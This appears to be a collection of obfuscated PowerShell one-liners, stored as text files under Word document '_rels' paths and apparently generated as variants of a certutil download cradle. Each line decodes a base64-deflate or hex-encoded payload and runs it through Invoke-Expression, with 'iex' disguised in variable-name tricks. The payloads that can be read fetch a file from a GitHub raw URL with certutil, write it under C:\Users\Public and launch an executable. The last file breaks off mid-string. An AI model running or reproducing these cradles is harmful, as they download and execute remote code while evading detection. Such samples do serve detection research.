<file path=word/_rels/obfuscated_commands_certutil_string1_encoding6_compress_1.txt> (nEW-objECt  io.sTrEamreaDer( (nEW-objECt io.cOMpREssiOn.deFLatEstrEaM( [io.MemorystReaM] [SYsTEM.COnVeRT]::FroMbASE64sTRING('7b0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ/ff/z9cZmQBbPbOStrJniGAqsgfP358Hz8i0u+dfDt79b3vfz/dSvd3Rvj/vYejhw/TUbq7s0v/7O6P0nv4c/8evqEPPsV3uw9G/Nvuzn38c0Cf3dtLucX+Pf15X9oxDG1CgBhOKl08fIBf6Es02KXXCAS9ps2oOXVyn7vbAz4HjBU6RNf0rTaS14DHnuIBiEDV4s7NDe5oALj3D0b7hAH+nzI0bbVPWDHewONT9HnPJwKPWimhHQHCw4ORkOW+DIbHzcO0w8Znu+h8x3bIXyooeWmH/6VuqWuZiN1d+vKhIoq+PTryF7s7n46U1EIuBncPgB94vfEL2sNDgfUQv1HbB7Z7Hu++UCRVDKVXC3xkGqRmCMIHAhrU8qm+/0Ax8ilouOu+fBxSIuVXCDeZBUNrj7kcgdGWaaADYh7BxFn0wM8PAHlfafyQOn1I7e5jEPfBMg/vC5V4djzukzk17xlKKZWZM5hcezu2OzsK4UPMn6DNP+5Tr7t7hNM+/8Ik21MqcYv9A3wipOyyknbrkxZv0x8CTP7aZwLsYUB7AgaDFflTTOyEkuh5bKi4+NJO6DAoQVngYk7uY1ieuMs7GKxFl/8FGwIBSwL51HAL46SyS3/t6OuElsFBqbnruFGZZ8dnadUdvReV3DoMJX1qKWRozACBtveyGUMoBDoBdp7TcDINfAt+T/EVapq5wMCVBJ4gp4q9URQGsvCDry10ntw4AgliOWBiCAEcpHB4yjCCsKCvLKfUYLW922Urx38yN5Zl7OQ4cJZDZJaMlvQFzFPqwj8+qyl3C3OD70QZy1T5nEcS6M/hPvELrM8DlkuIIX3wKfX+ACLxKfo6wKf0/v0Ho/v0Lt7Y3aMJv0cmYUe5ktUkwTwgLA729aUH9NIDTDhpuYcYBKF0QHz+6UNtkH76qXDsAdAzpGSTo1YuFTslvx+QZeN3AfTTBwSH0QfG+xgj9Xt/l3syZFRtw0N8QGrhAf364B4jJdQAr+ze2f7Ol2fL9OOPfyb9hWTbf7eXzbe//CL/3t7u9z/53V6+nldfnH7v3s73P/n49/74zv8D'),[sysTeM.Io.coMPReSSiON.cOMpRESsIONModE]::DeCOMPRESS) ) ,[systEm.texT.eNCoDING]::ASCiI)).reaDTOEnD()|iEX

</file>

<file path=word/_rels/obfuscated_commands_certutil_string1_encoding7.txt> ( nEW-obJeCt SYsTEM.Io.stREAMreADeR((nEW-obJeCt  IO.cOMPReSsIOn.dEFlaTeStREAM( [iO.memorYStReAm] [cOnverT]::fRombASe64sTRINg('7b0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ/ff/z9cZmQBbPbOStrJniGAqsgfP358Hz8i0l+YbqW/W/Pt0+fl2dPv7X7/E/o9f/68mH1v9973P/n49/74ztZHv9vW69M328Wb/Is0/fgnj1+dZU+enz6qzl9/nH788Z2PPvne6zd18eLi+1sEan9nxP+/93D08GE62t3ZpX9299NRurv76egefZTu30vpF3zwQD7Gvzv3qe3B6N7eaP8+3niAb/YB4IC+Bqj04QP+DbDT0f49Aba7sy+dBKAJDH7gT2Cyfx/Q+J89fudAPr4nsKhzxS81/e+gHf1B4IHNpwInlTcM0n4XAM2dpKP7wHifkMX/ZewPeTho/imA3+MB2z49MNyf4saoESF0ZBjRw4ORoRpGg3GDTCN+QYb+kHGRL3YMfaWlASSD3t3BwEb7nyqpuB8mtEdfhbTzUAbDsxTOwO7OpxYyY6BzZ4aH0eIj9BcMjJBjsgCe/MID29nVZkoQQR+TzHxx337CjXlOdyzOhoj3lPafOiJxy091UnYeMqpm0MDuvrzrceenlql4WEAMtKap7QJg1gRXYY4fGtblsTwEXJq2+/TifTDVQw9l5UAzYdSMe+CuPJIwbsw5Biczienunp3je3sGJqPGMwlW3N0DWfYBe08G6XPBHpGKG8l8PRAS27HqPFIrQKBWI/09VXAsUXiPkQcJME8PBTeDpemNQHhSJO/vyaRxKzMFBleQ9X5H4DFM5nHCUTQEzzJjztPNCENroCVL/g7TCJMBfhKG3uFBuikQsCq8Binp1ENIyGUoyaLIFArU3H3TTFsp8Xr0EpYRJmZd6ebCvqVclhqCMV+QXrKzG5DOoK69WQ71kLAjdhP4wBsqsA8hmqGNzMBSH0fpK5g+ZhLRs6DPQyaoGagbp2BoYAg2POGqI2l2hbet6trf5VmSaaXPHuwIN0BPP9xlrnhAf37KAka8+5Ag3wfA+4Czvyuv7u7ts84jRU8f4//pwadGaAkoRvGpCK0g7nBQAUv3YReYBQmDA3y6b2QP7URSd4DIAwL7KYjzcHd0f3e0T13jffwfvHJ/R7BMeTysSR/QIOiTBywp3Nlueif9md/9F6db35t++/jV99PvFcs3309/t9//TvpL0juffJT+bltpk7fbZzDPH19mdXE8KfNHX543ZJ3Tj++kH6V30v8H' ) ,[IO.COmPRESSiON.cOMpreSSIOnMoDe]::DEComPRess) ), [teXt.ENcODiNg]::aSCiI)).ReAdtoEND()| &((VaRIABLe '*MDR*').NaME[3,11,2]-Join'')

</file>

<file path=word/_rels/obfuscated_commands_certutil_string1_encoding7_compress_1.txt>(NeW-obJECt sYsTEM.iO.CoMpresSIOn.DeFLATEStREAm([io.mEmORYStreAM][coNVeRT]::FROmBASE64stRINg( '7b0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ/ff/z9cZmQBbPbOStrJniGAqsgfP358Hz8ifuFW+rs189OyLJ5+b/f7n/xur799Wj4/m31v9973P/n43cd30q30o99tq8nfbBdtvkjTjy+zujh+Up4+qs6bj+nvj9M7H33yvdftq7MXn39/K/14f+e7+zu/5N7DX/Lw4e+/u7P7k7u7+4/vPfzu/r0v7z283t399PXu7oOfpF/3713Tx/TB492d+yP+AB/v7hz8/vf2Xu/ff0ztfjF/TC/+YoJC0A5GBPTew99//x69MHr44Lvcx/6X1A8BG+3foy9/8b297+7fp17uj3Z390aARx0Q6Nf7917Tu9Tjd+/t/ZL9+7/YIbGzR299abD8JQTyl1AzYEsI7n1JsH7J/QMaxS/Zv/fdew+/3H9A/6Me9l8/fEBo0gefCla/mAdwj/C5Txh/Sp3v0/gJzQP8+P0Zh8dMBkJuZxcgHj/En/h150u8QgNgpEC7X8Jjkhd2fhLf7n/6JYa8S2Tdefglf01j+sn9B9Ttffo/uv+U3n7MiNIggCbjArzw93cF1M4vfviA0Hz43YeYDBr3L+Eu8dkuSASy/qQdMGaI4IAgv5i+INzvU6MdIhSw+5KReM0koend2f3F2ufvj48IJx4ToD1E9/e/y3CJGiPBC+33f/H+AwL3kCiKeaZP8Osv5jcJNXDRLwbFHt7/JQ8PHt/fH93f+8mHQGqHJmD38cMDIh7zwe/PwImMj3mAD4DLL9n/FF093t3b4SHco3cffnn/4DUTkDqhbzD9rxnL797HbH6XCY/p/yX05S++/+lP+p/9/krZa51F+vs+A7n/6S/BKzwDGDd99prelVf2XvPn+Jfel2kisD/5kMa7cwAqE16/mPshGr2mdwkXGsDeL5ZfHwMMphto/P4PH4zuP/xJ5jswyr29EVhpZ/dL/uj3N0IDNmRkwRc/yb1/l/mTeqR39mkmd3ZAW+IsegOvjxgtwmdHuHCPmPTxfeLhvb1rGiDLzWshBJB8LEiOjDxBwsEuv78gY0azuy98T9RknsFXQhod6XdNz6/5Mwx798EvMcxDc0zMdHBtAP4SkepfzKgQ7t8lICMhP8hFM3HNhBDtsfcl8R4jSIT5khng9f0DIPNap0xwEHx/fxa5PWHUn3SC9FiZFQNRtkC7399M6y8RarA0oGNooGsG8liwwIhk9N/FDB5A3f0kRPch8+AvuQ8F8JP8LSZbeI5JvQem+iXMrdLq9zfqbI/ESiaNaUOjgdbd4zllzHZpkkcHUIW71wc7rGE/vf+LP4Wg7aI76fhLGcj1/v4vfrhLivX6wd6Xn97//Q/2vvvw3uv7D37/+zu/eH+X8NgfPbj3Sz59eH1w8PH269Xzszcfv/54u3lZ0i+/+ON0+/XL52ftx1+a735/fLQqi/bj79JvDf92zc3ot/Tjn9Sv33w8+pg/e5N+/Ev4s+f4+vHHP3P+5av8ePrtX7z1vem3j+vvf+/sxZvvp7/b738n/SXpnU/IMr2+TD+unr2GJaL/7qQf3fl/AA==' ), [io.COmPrEssIon.COMPrEssIoNmode]::decOmpreSS)| foREacH{ NeW-obJECt  io.sTREaMreader( $_,[SYstEm.tEXt.ENCoDing]::AsCII ) } | FOREach {$_.rEAdtOeND()})|IEx

</file>

<file path=word/_rels/obfuscated_commands_certutil_string1_encoding8.txt>( nEw-ObJECt  sYsTEM.io.StREaMrEADer( ( nEw-ObJECt SYsTeM.Io.COmpReSsIOn.DeFLATesTReaM( [IO.MEMORYstrEAm][CoNverT]::frOmbase64StrING('7b0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ/ff/z9cZmQBbPbOStrJniGAqsgfP358Hz8i0i36795eOkr3d/D/dHTv4ejhw9Huzu5od3c/pX8+HaW7uw/wz6fUbHfnPn15MKKXRvv38f0Dfifdvyc/+S1qdkD/PnxI/9CH+A4/H1JbfHYPn8sLBGFnH+130YQRoQ52GfIevjwYcZfonLukP/fwq3kRXwBJab57f3QfPe8/4H8wBuoVzbjLT7nH/XuMDXUKvABewRBADPXhAY+LoQn6iuiuGZ75EEPEZ7sj+UTA7u4o2XhQ9KdguA/6gba7uwD2UDDkV5RAgk1qPgNQaSdYG3rJjPBozQTt3DNElZ/6PRDZ6byfYhZShuvNm34o/2LuZbL3FSOQwn6W8pTIwJSITGozZMZL+cX0LEN6oJ+YASseipJ5zXDfCFB3gJvPMcxc9PVDobmBqCD2uYlODs/YQ4KKGb1PY7m/h7/tnGB6ZLL30WeKnpgGGO6+MBag7u3ob/fwPgG+f4BP7ykBdXCE1B5RiT6mX3XgMmN7zEdmCtzsjQyH7MufPi9wB2kAFr97g9vjgewpSytzQFIxJCaSctNDxkGApQZaCizp91Sm/j6z2Z62Th2vOwXgI6fywhNGHRnJ3FHqayMCItCY0vS1Dhhk9OkhJNVhK98rGZV2pql8zHMizMKyDUIowkJHQy1tZcduZERlzVCwK4OYnoCIjv9SwTeAKnCEpIFyUzSZwPcwUZ4Q4p/7MhI7Uv3Lw3xXBUMH6EkTf74v3xpsLBhLppBdeKyi4XhsPML7Okc+GoqF0gj477NU8gc7dp4YDSAmY8bXsAkPWOWArMRPD3dF56cP9hjQAfMYvXuf2W5nhNd29yC3e9wNXiRjBHqxBAqP0fefqugL5g/uCb895F6pA4LJ1GWJ5beox0/piweitjBRUFufHuAleSe9D+x4Hh1T7Cidd++kP5P+7r843fpe8eLN93+33387e51+b/rt7NX37/yS9M72d74slh9//DPpL9xKf7dV8+0vF6ff29v9/ie/28vm29Ui/969ne9/8vHv/fGd/wc=') , [Io.ComprESSion.coMpreSSiONmode]::DeCOMprESs ) ),[teXT.eNCODinG]::ASCII)).READTOeNd( ) |. ( ([StriNg]$verboSEprEFERenCe)[1,3]+'x'-JoIn'')

</file>

<file path=word/_rels/obfuscated_commands_certutil_string1_encoding8_compress_1.txt>( New-ObjECT iO.streAmREaDeR( (New-ObjECT sYsTem.iO.coMpREsSion.dEFlATEStrEAM( [io.memorYStream] [CONverT]::fROmBasE64strInG('7b0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ/ff/z9cZmQBbPbOStrJniGAqsgfP358Hz8iPkp/t63Xl+nH1bPm4/Tjj9M7H6WfpN9r2vrsxcX3v3fy7eNX3/v+97f2d9JReu9hOnpI/9/d2cUfo3T/Hv/c3d2nD3c/pf8/GKX0C7Xd3blP7Q5GeIfa6dvpvb3R/n18vfuA/91Ho9SHhi5G6UP6Wl+ln/hod2efwe4ylJTB7O7eB5A9/uIAiN0HHvSqabCzx7/T1/vyjUFPXtqlNvfR/z71h//zUFzHhAyPiD/4FPDu4euRDkiGmeoHaC7Q8Zt8wj2b8T486Ly8yz0ynrvcNw0c5OQ/dvi1T3XMBichI30rXe373cl3AsF0xEjtPJTRAV3+F+T81ALVXxw60q9Hf3rlHjcIZwpoMC5MJfRCv+zuPLADYuxl3u6P5E0mgU7cpzKripWMmDqSiZCR6yRpt/ryp3Y4POAH8r2bA2aNTxUL5jJHdp1nIkFIN8b8gCebh+PRRmamw8kC++F97tJM6cOD0X0a0H1iroc8wh1gsoup13ZGYBSApRdw3v9U0d7bcQNOzYjBx5C+9P5BMJwUPcr45YMDfHP/U/uFm8WDe6P7LKV2npXvmEr3DViFOpLmAuZAxMERgAHtWcIbhiaSHIysMAJf8/r9T+V3ix6N/f5DEU+IvJ0s/hdkCLVJyupkT3pX6UxFmeyAzDvM80YnCUiSA/flHmsWFnfFydKpI176DSOizOVxbkhtgGY9RvST4cmrTD8FA0IJJCGOB4DH5k2Txd287+ZPgRl6+lgxrkRPHWMo1xhxqCIINo+RBn9fOdv0oB9b2bB6ihnENPVFwGcLj5eEfwwpDFzWuwwv5CZVjZ6GUxbCuB4aEB5bHyhupmPB2QNgtIJtQQrcdGHmTacBeEPkzHiozS43Tw/2tOHBzujBp6NP77N14nb7OwxGEbPds/kYPdwTTc8cvcdiiAHu8WvpPnMk0BLY++Bj+vnpCEgf7I0e3KOumFnSB8YAsNETopEMPBD1t8PN6RMlBvAigj84EMWC1p8SNvTxfXxFiOwzBP6Hur1PqvuemMr0gcwcowy6P1C2EcB30k8+YkeBPIVz8hRSchbSO+lH6c+kvzDd2rrI2+2fzF6dHU+en6Yff+uLWf2tj++Ml8df5N+7R/M92vv+9k9XZ8uPP77z/wA='),[SysteM.IO.COMPReSsIoN.COmpresSiONmoDE]::DEcomPrESS) ) ,[text.enCOdiNG]::ASCiI)).ReADToENd( )|. ( $shELlid[1]+$SHELlid[13]+'x')

</file>

<file path=word/_rels/obfuscated_commands_certutil_string2_encoding1.txt>(( 20 ,26,28 , 28 ,76,61, 72, 49 , 41, 42 , '4c',65, 20 ,27,'2a', '6d' ,64, 72, '2a' ,27 , 29,'2e' ,'4e',61, '4d' , 65 , '5b' , 33 , '2c',31 , 31 ,'2c', 32 ,'5d', '2d','6a' ,'6f' ,49, '6e',27, 27, 29, 20, 28, 20 , 28,28, 28,22 ,'7b',32 , 37 , '7d', '7b', 37 ,'7d', '7b' , 32,35,'7d' ,'7b' , 34,30 , '7d', '7b' , 34, 32, '7d' ,'7b', 32 , 31 , '7d', '7b',33 ,37 , '7d' ,'7b' , 32 ,30 , '7d' ,'7b', 36 , '7d' , '7b',31,32, '7d', '7b',31 , 30 , '7d' , '7b',30 , '7d', '7b' , 31 , 36 , '7d','7b' , 34 ,31 , '7d','7b', 32 , 39, '7d' ,'7b',33 ,33 ,'7d', '7b' , 31 , 37 , '7d' ,'7b', 31 ,39,'7d', '7b', 33 , 34 , '7d','7b' , 32 ,34, '7d' ,'7b', 31 , 34 , '7d' , '7b' , 33 , '7d', '7b', 31 , 35 ,'7d','7b', 33, 31 ,'7d' ,'7b',33 , 30 ,'7d' ,'7b', 31 , 33,'7d', '7b' , 34,'7d', '7b' , 33,38 ,'7d','7b' ,33,35 , '7d', '7b',31, '7d', '7b',31 ,38,'7d','7b' , 39 ,'7d' ,'7b',32 ,33,'7d','7b',33 ,36, '7d', '7b' ,35,'7d' , '7b' ,32 ,36 ,'7d', '7b', 32, 32 , '7d', '7b',38 ,'7d' ,'7b',33,39 , '7d', '7b' ,32 ,38 ,'7d', '7b',32, '7d', '7b' ,33, 32,'7d', '7b',31 ,31,'7d' ,22, 20 , '2d' , 66,20 , 27,73 , 74 , 27,'2c', 27 ,'6f', 64 ,65 , 20 , 63,'3a' ,66,54, 41, 66, 54 , 41,75 ,73, 27,'2c',27,41 ,61, 27 ,'2c', 27 ,75, 73 , 65,27,'2c', 27, 61,'3b',20 ,63 ,27,'2c',27 , 70 ,75, 62 , '6c', 69 ,63 ,66, 54, 41 , 66,54 , 41,61,20 ,63 ,'3a' ,66, 54 ,41 , 66, 54 , 41 ,75 ,27, '2c' ,27,73,65,72 , 63 ,'6f' , '6e',74,65 ,'6e',74 ,'2e', 63 , '6f' , '6d', '2f' , 27 , '2c' ,27,'6c', 20,'2d' , 75 ,72 , 27 , '2c', 27 ,66, 54 , 41,27 ,'2c' , 27 ,72,73, 66 , 27 , '2c' , 27 ,74, 68 , 69 ,27,'2c' , 27 , 65 ,78, 65,27 , '2c',27, 69 , '6d','6a', 75 ,73 ,74,67,75 ,'6e' ,'6e' , 61,'6d' ,61 , '6b',65 , 27,'2c' ,27, 41 ,66,54, 41,27 , '2c' , 27 , 63 ,'3a', 66 ,54 ,41,66 ,54 ,41 ,27, '2c', 27, 72 , 73 , 66,54,41 , 66, 54, 41, 27,'2c' ,27 ,68, 69,'6e',67 , '2f',74 ,65,27, '2c' ,27 , 62,27,'2c',27 ,65,27 ,'2c',27, 36,34 , '5f', '6e', '6f' , 62 , 27, '2c' , 27 , 74 , 68, 75 ,62 ,75,27,'2c', 27 ,'2f' ,'2f' ,72 , 61,77,27 , '2c', 27 ,54 ,41 , 70 , 75 ,62 ,'6c', 69 , 63,27 ,'2c',27 , 54 , 27,'2c' ,27,61, '6b' ,73,'2e',74 ,78 ,74 ,20, 27 , '2c', 27 , '6c' ,63 ,61, 27 ,'2c',27,73, 65 , 72 , 73, 66,54, 41, 66 ,27,'2c' , 27, 63,65,72,74,75,74 ,69 , 27 ,'2c' ,27,54 ,27,'2c' , 27 , '6d' , 61 , 73 ,74, 65 , 27 , '2c' ,27, 54, 27, '2c', 27,70,75, 62,'6c' ,69 , 63, 66,27 , '2c' , 27 , '2e',27, '2c' , 27,72,'2f','6d',61, '6c' ,77,61, 72 ,65 , '5f' , 27,'2c' ,27 , 72, 65 , 27,'2c',27 , '6c' ,20 , '2d' ,64 , 65, 63, 27 ,'2c',27, 41,66 ,54 ,41, 27, '2c' , 27, '2e',67 , 69,27 , '2c' ,27 ,65 ,72,74,75, 74, 69,27, '2c', 27 , 66 ,27 , '2c' ,27,63 , 68, 65 , 20 ,'2d',73 , 70 , '6c' ,69 ,74, 20 , 27 ,'2c',27 ,73 , 74, '2f',27 , '2c' ,27, '2d',66, 20 , 68 , 74, 74, 70 , 73 , '3a' ,27 , 29 ,29,20,'2d',43 , 72 , 65,50 , '6c',41,43 ,45, 27 ,66 ,54 , 41, 27,'2c','5b',63 ,68,41 , 52, '5d' ,39, 32, 29,20 ,29 , 20) | %{ ( [chAr] ([conVeRt]::ToinT16( ($_.TOsTrING()) ,16) ))} ) -Join''|INVokE-eXpRessiON

</file>

<file path=word/_rels/obfuscated_commands_certutil_string2_encoding1_compress_1.txt>"$( sET-VARiAblE 'oFS' '' ) "+ [strING]( '28y28t28V22I7by38W7dl7bI36%7dV7bl33y32I7dV7bt33%37I7dV7bt32t35y7dV7bP34%32l7d%7bP36V36W7dP7bV31W39%7dP7b%33W30V7dW7by36V34V7dt7bW32l7dW7bt34W30y7dW7by35P39W7dP7b%33P33%7dy7bt31W33%7d%7by32%39I7dW7by33%36%7dP7bW35I38I7d%7by34V36y7dV7bV36y31t7dt7bt31t30y7dW7by36P32t7dV7bl35l30l7d%7bP37W7dy7b%34I35y7dy7by36t35t7dW7bP35%35P7d%7bW34W7dW7b%31I36t7dI7by36t33l7dW7bP34V38l7dW7bV39t7d%7bW35P32t7d%7bt34V31V7dI7bl34y34l7dP7bW30I7dI7bt33l31V7dt7by32P36P7dV7bW34l37l7dt7bV31P37%7dW7bP33W7dI7bt35V31t7dl7bV33I34l7dW7bP32P34y7dt7bI32y32t7dW7bP31I31V7dI7bW33%38y7dl7bP34l39V7dl7bV35y36I7dP7by31I32l7d%7by31V38y7dV7bW33P39V7dI7b%35P7dI7bl35W33V7dy7bl32W37%7dI7bt31W34l7dW7bI32y33t7dV7b%31t35P7dV7bt34V33y7dy7bP32%31W7dI7by36I37W7dy7bt33V35t7dy7by36y30I7dP7bV35W34%7dy7bl35y37%7dI7bP31%7dl7bI32t30y7dV7by32W38V7dI22t20y2d%66t27l4dl57l45W4dV57l75W73P65t72W73V45%27I2ct27%57l45t4dl57V27W2ct27P74I70l27I2cV27W69P27I2cl27W72P2ft6dl61I6cW77%27l2cP27V45y27P2cy27%65W72V27V2cV27y73y74P68W69I6eI67V2fP74V27V2c%27%63W27P2cy27%62I27V2cI27P6et61I6d%27I2cV27y6fP64t27l2cy27l57P45y27V2cV27P73I65l72W63V6fW6ey74V65I6eW74l27I2cV27y3aW27l2cV27W4dP57I45t4dW57W27%2c%27V61t72P65V5f%27t2c%27V75t62l6cV27W2cP27y4dl57V75y73I65%72I73I45V4dV57I27W2cV27P74l20%2dy27W2cI27W61P2el65P27P2cl27l65t72V73I45V4dl57I45l4dt27W2c%27l63W27V2cP27t45y27P2cl27y69y6cW20l2dt64W65t27%2cV27l6cW20t2dV75W72t27t2ct27W45P27I2cI27P57P61l20y63I27%2c%27W78V65P27V2c%27%2el63V6fl6d%27y2cl27t66V27I2cI27W4dI57l27%2cl27P74y75P74P27%2ct27W75P27l2cl27y45V4dV57%61%3bV20W63l65t72I74W75y74I27V2cW27y70l75W62P6cI27l2ct27W2fV27P2cW27t69W27V2cI27%65l20%27I2cP27I45W4dW57l70t75t62I6cV69%63l45P4dI57l27t2cl27%73y3aV2fW2f%72W61%77t2eI67l69y74W68P27l2cV27P65W61t6bW73V2e%74l78y74W20y63P3at27V2cl27I6ct63l61W63P68P65t20%27V2cl27y75y73V27I2cI27y45t27l2cy27%65y73l27I2cy27l6dt6aI75P73W74P27P2cl27I4dV57W70%27y2c%27t6e%6fP27t2cl27%63W3ay27V2cP27V68t69P27t2cl27V63I45t4dI57W27y2ct27W72%27W2cW27t4dy27%2ct27I63I27I2cV27W73t74y65W27W2cy27W45V4dl27y2cV27I45t4dy27%2cP27l69y27W2cy27P75y62%27y2cP27I69t27l2c%27%67W75P6et27V2c%27W61W6bl65y74%27V2cW27%62V36l34t5fV27I2cI27W20%68P74l27P2c%27W74%2fy6dW61t27t2ct27P2dl73P70y6cV69%27%2cy27t57y27y29l29V20P20t2dl43P72t65P50t4c%41%63P45V20y20y28W5bW43I48V61V72V5dV36y39W2b%5bW43V48t61l72y5d%37t37%2bI5bW43%48V61%72%5d%38y37P29I2c%5bt43t48%61y72I5dl39I32V29y20V7cy2e%20%28I20l24l53I48t65I6ct4ct49I64y5bl31%5dl2bl24t73V68W45l6c%4cI69y44y5bV31P33l5dW2bl27I58W27y29' -SplIt'y' -sPlit'%' -SPLit'V' -spLit'I' -sPLIt't'-SplIT 'W' -Split'l' -SPLit 'P' |fOREACh {( [COnVeRT]::toINt16(( $_.toSTriNG()), 16)-as [cHAR]) })+"$( SET-itEM 'VarIABLE:OfS'  ' ') " | & ((get-varIabLE '*mdr*').naMe[3,11,2]-JOIN'')

</file>

<file path=word/_rels/obfuscated_commands_certutil_string2_encoding2.txt> INvOkE-exPressIon ( "$(sv 'oFS' '')" + [STrINg]('20!28-28x28!22}7b!32-36j7d}7b!33x7dx7b-31j37-7dj7b-33x32-7d-7bj33N33N7dZ7b}34Z33N7d!7bN35x7d}7bx31!33x7dZ7b!32-32}7dx7b-34j30-7d!7bx33}34@7d-7b-31!35}7dx7bx33Z36-7dZ7bZ33!37@7dZ7b-39@7d@7bN32x37}7d!7b}31Z32j7dN7bx37N7dx7b-31Z7dj7bj32x39@7dZ7bj33j39@7d@7bx33-30}7d-7bN31-38x7d!7b}31}30Z7dj7bN31@36@7dx7b-32@34}7d-7bN33-38Z7d-7bj32x30!7dx7bZ31Z31x7d!7b-36j7dx7b}30N7dZ7b@32N7d}7b@34N7d!7b!33@31N7d@7bx34Z34x7dj7b}32j38}7dx7b}34x32-7dj7bj34@31x7d-7bx32Z35-7dZ7b!32Z33x7dN7b!38@7d-7b@33j35j7d-7b@31!34@7d@7bj31N39Z7dN7bZ32N31}7d!22}20j2dZ66}27Z65}27Z2c}27@72-65-5fN62-27x2cx27j72!27j2c}27N2dx75Z72Z6c}63!61@63!68@65-20N2dZ73@70j6cZ27j2cZ27x73-7bN30Z7d!7bN30@7dZ70j75}62!6c-69}63N27-2cZ27x72Z61!77j2e@27j2cj27Z63-3ax7b-30@7dx7bN30j7dN75x73x27N2c!27}6cZ77Z61N27!2cZ27N30N27!2cx27j65}74!27}2cx27!70N75Z62j6c}27N2c}27!64Z65@20x27@2cN27!74-65}72j2f}6dx61}27@2cN27j67Z69-74@68}27!2cN27!7b@30-27N2cN27Z2ex63-6f}27N2cj27N69N63x7b@30x7d}7bN30-7dx27-2c-27@69}74j20@2dZ27-2cj27N73}65!72}73j7bN30}7d}7b@30j7dZ27}2c!27j7dZ70Z75}62-6c@69@63!27Z2cN27N72N74N75N74N69j6c-20}2dZ64!65x63@6f@27-2cN27Z7b-30!7dx7bj30-7d-61Z2eZ65!78x65N27-2cN27j75!62-75@73N27Z2cx27x72N73-7bZ27j2c@27Z61-27-2c!27-73j65@27j2cx27!63-65Z72-74Z75Z74-69}6c@20x27x2cN27Z68!69-73@74-68@69-6e@67-2f-74-65!73x74@2fj6d@61}73-27x2c!27j61-20j63N3a-7b@27-2c@27N36j27N2cj27!6b@73-2ex74Z78x74}20-63-3a-7bx30x7dN7b-30x7dZ75!27x2cx27N7b@30}7d!7bx30}27j2c@27-66x20N27x2c-27@68-27Z2cx27}6e!74N27-2cj27@7dj27-2cj27@6dZ2f@69x27-2cZ27!6dx6a}75-73x74x67Z75}6e!6e@61N6d}61}6bx27x2cN27Z3bj20}63-65@27x2c-27}34@5fZ6ej6fZ62-72j65Z61-27N2c-27j65x72Z63x6fZ6eZ74N65N27-2cj27-7bN30!7dj75Z27N2c!27!30}7dx27}2cj27N74@74}70j73N3a!2fZ2fj27-2c}27N7dj27!29Z29!20!2dj46!20x20Z5bx63}68@41Z52-5d!39x32j29x20j7cN69-65j78'.SPlIt('ZNj!x}-@' )|% { ([COnVerT]::toinT16( ( $_.TOSTrING() ) , 16)-As[cHAr]) })+"$(SV  'Ofs' ' ')") 

</file>

<file path=word/_rels/obfuscated_commands_certutil_string2_encoding2_compress_1.txt>" $(seT-variABLe  'OFS' '' )" +[stRINg]( '28<28N28L22<7bL32q39N7dq7bY34:33Z7dN7bN31q30Y7dN7bY34q7d:7bq32q36m7dL7bm32N35:7d:7bY32m33<7dq7bY31Y35N7dq7bm34Y37Z7dm7bq36Y32N7dL7b<34L35q7dY7bL36q30m7dZ7b:34q32q7dm7bL36L7dq7b:35q33<7dY7bL35:39Y7dL7bq32:32Z7dY7bL31N38N7dY7bq35<31L7dZ7bY33L35q7dq7bY35Z36Z7dq7bL35<34Z7dN7bN38Z7dN7b:31N37:7dq7bL35m30Y7dL7bq31Z33Z7dN7bm33Y31Y7dq7bY35:7dY7b<32:34N7d:7bY35:37q7dZ7bY36m33Y7dN7bm33N33<7dq7b:32m37Y7dN7bY32:7dm7bL32:31Z7d<7bq33Z32:7d:7bq31L7dY7b:33:34Y7dZ7bN33L38L7dN7bZ34Z31m7d<7bL33q36Z7dY7bm35q38q7dL7b<37<7dm7bZ30N7dL7bZ34:36N7dL7b:31Y31:7dL7bZ33N30N7dm7bY34Y39q7dN7b<33m7dq7b<32L38Z7dm7bL34L38N7dZ7bN33L39Y7dL7bY31:32q7dm7b<36:31Y7dZ7bY31L36N7d<7bL31Z34m7dm7b:32<30Z7dL7bq33m37Z7dm7bY34q30<7dY7bN39L7dY7bq31L39q7d:7bL35q32Z7dm7bN34q34:7dN7b<35m35<7dN22<2dZ66L20L27N63N27N2c<27:30q27L2cN27N62L6cZ27L2c:27<30L27Z2cY27q20q27:2cZ27Y2eN74Z78L74<27Y2cZ27<74Y2e:63L6fY6d:2fZ69<27L2cN27L64q65:27L2cq27:77Z27<2cY27N69N27q2cN27Z20q2dY75Z72<6cL63q61q63N68m65:27q2c:27:65m20q63L3a:7b:30Z7d:7bL27N2cm27L7dY7bY30:7dZ61Z20<63Z3aL7bm30q7d<7bN30:7dZ75N27:2c<27m62Z36Z34<5fm6em6fZ62m72N65q61:27Y2cZ27N72<27N2cN27N70q27L2cN27L65Z27L2cZ27Z61L27<2c<27N6e<61N6dL61<6bY65N74<68Z69q27Z2cN27Z63m7bL27m2cm27m73Y7b<30L7d:7bL30Y7dq27m2cZ27L69q63L7bm27q2c:27:75Z6eL27q2cY27<20m68m74m74<27L2cL27N20q27q2cZ27m2d:66:27m2cm27Y2dq73m70Z6cZ69L74m20m27<2cN27Z7dY70m75L27Y2cq27<7dL70m27:2c:27Y63<65:72q74<75<74N69Y27m2cL27Y30m7d:75m73Z65N72N73<7bY27Y2cL27N6bL73<27L2cY27Z30L7dZ7bm27N2c<27m7dq7bm30L27Y2cL27q7dN27<2c:27Z74:68L69<6eL67:2fq74q65:73Y74L2fZ6dZ61q73m74:65m27Z2cm27Z69q27Y2cY27N70Z27Y2cZ27:61q3bN20m27q2cZ27Y63m7bN30:27N2c:27N75N62<6cL27Z2cN27:63m65L72q74Z75m74Y27q2cY27q65Y6eN27L2cZ27:6cL27q2c<27N30m27<2cm27<75N62Y75:73m65N72Z63m27L2c<27m6fY64:27m2cm27Z73L3aZ2fZ2fm72<61m77Z2em67L69q27Z2cY27N75<62:6cZ69N27q2cN27<30m7dZ7b<27Y2cZ27m72Y65<5